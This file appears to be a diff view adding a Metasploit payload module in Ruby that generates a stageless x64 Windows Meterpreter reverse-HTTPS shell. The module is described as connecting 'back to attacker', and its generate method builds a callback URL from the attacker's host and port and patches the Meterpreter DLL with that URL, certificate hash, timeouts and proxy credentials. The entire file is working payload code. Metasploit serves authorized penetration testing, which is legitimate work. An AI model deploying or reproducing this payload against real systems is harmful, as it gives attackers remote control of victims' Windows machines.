|
| 1 | +## |
| 2 | +# This module requires Metasploit: http://metasploit.com/download |
| 3 | +# Current source: https://github.com/rapid7/metasploit-framework |
| 4 | +## |
| 5 | + |
| 6 | +require 'msf/core' |
| 7 | +require 'msf/core/handler/reverse_https' |
| 8 | +require 'msf/core/payload/windows/x64/stageless_meterpreter' |
| 9 | +require 'msf/base/sessions/meterpreter_x64_win' |
| 10 | +require 'msf/base/sessions/meterpreter_options' |
| 11 | +require 'rex/parser/x509_certificate' |
| 12 | + |
| 13 | +module Metasploit3 |
| 14 | + |
| 15 | + CachedSize = :dynamic |
| 16 | + |
| 17 | + include Msf::Payload::Windows::StagelessMeterpreter_x64 |
| 18 | + include Msf::Sessions::MeterpreterOptions |
| 19 | + include Msf::Payload::Windows::VerifySsl |
| 20 | + |
| 21 | + def initialize(info = {}) |
| 22 | + |
| 23 | + super(merge_info(info, |
| 24 | + 'Name' => 'Windows Meterpreter Shell, Reverse HTTPS Inline (x64)', |
| 25 | + 'Description' => 'Connect back to attacker and spawn a Meterpreter shell', |
| 26 | + 'Author' => [ 'OJ Reeves' ], |
| 27 | + 'License' => MSF_LICENSE, |
| 28 | + 'Platform' => 'win', |
| 29 | + 'Arch' => ARCH_X64, |
| 30 | + 'Handler' => Msf::Handler::ReverseHttps, |
| 31 | + 'Session' => Msf::Sessions::Meterpreter_x64_Win |
| 32 | + )) |
| 33 | + |
| 34 | + register_options([ |
| 35 | + OptString.new('EXTENSIONS', [false, "Comma-separated list of extensions to load"]), |
| 36 | + ], self.class) |
| 37 | + end |
| 38 | + |
| 39 | + def generate |
| 40 | + checksum = generate_uri_checksum(Handler::ReverseHttp::UriChecksum::URI_CHECKSUM_CONN) |
| 41 | + rand = Rex::Text.rand_text_alphanumeric(16) |
| 42 | + url = "https://#{datastore['LHOST']}:#{datastore['LPORT']}/#{checksum}_#{rand}/" |
| 43 | + |
| 44 | + generate_stageless_meterpreter(url) do |dll| |
| 45 | + |
| 46 | + # TODO: figure out this bit |
| 47 | + # patch the target ID into the URI if specified |
| 48 | + #if opts[:target_id] |
| 49 | + # i = dll.index("/123456789 HTTP/1.0\r\n\r\n\x00") |
| 50 | + # if i |
| 51 | + # t = opts[:target_id].to_s |
| 52 | + # raise "Target ID must be less than 5 bytes" if t.length > 4 |
| 53 | + # u = "/B#{t} HTTP/1.0\r\n\r\n\x00" |
| 54 | + # print_status("Patching Target ID #{t} into DLL") |
| 55 | + # dll[i, u.length] = u |
| 56 | + # end |
| 57 | + #end |
| 58 | + |
| 59 | + verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'], |
| 60 | + datastore['HandlerSSLCert']) |
| 61 | + |
| 62 | + Rex::Payloads::Meterpreter::Patch.patch_passive_service!(dll, |
| 63 | + :url => url, |
| 64 | + :ssl => true, |
| 65 | + :ssl_cert_hash => verify_cert_hash, |
| 66 | + :expiration => datastore['SessionExpirationTimeout'].to_i, |
| 67 | + :comm_timeout => datastore['SessionCommunicationTimeout'].to_i, |
| 68 | + :ua => datastore['MeterpreterUserAgent'], |
| 69 | + :proxyhost => datastore['PROXYHOST'], |
| 70 | + :proxyport => datastore['PROXYPORT'], |
| 71 | + :proxy_type => datastore['PROXY_TYPE'], |
| 72 | + :proxy_username => datastore['PROXY_USERNAME'], |
| 73 | + :proxy_password => datastore['PROXY_PASSWORD']) |
| 74 | + end |
| 75 | + |
| 76 | + end |
| 77 | + |
| 78 | +end |
| 79 | + |
| 80 | + |
0 commit comments